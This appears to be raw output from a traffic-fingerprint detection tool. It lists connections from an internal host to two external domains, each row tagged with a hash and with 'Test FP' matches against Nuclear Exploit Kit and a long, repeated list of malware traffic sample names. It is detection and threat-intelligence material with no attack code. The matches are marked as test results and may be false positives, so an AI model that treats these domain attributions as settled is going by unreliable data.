pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49214 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49348 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49349 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49360 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49361 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49381 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49382 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49384 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49385 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49386 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
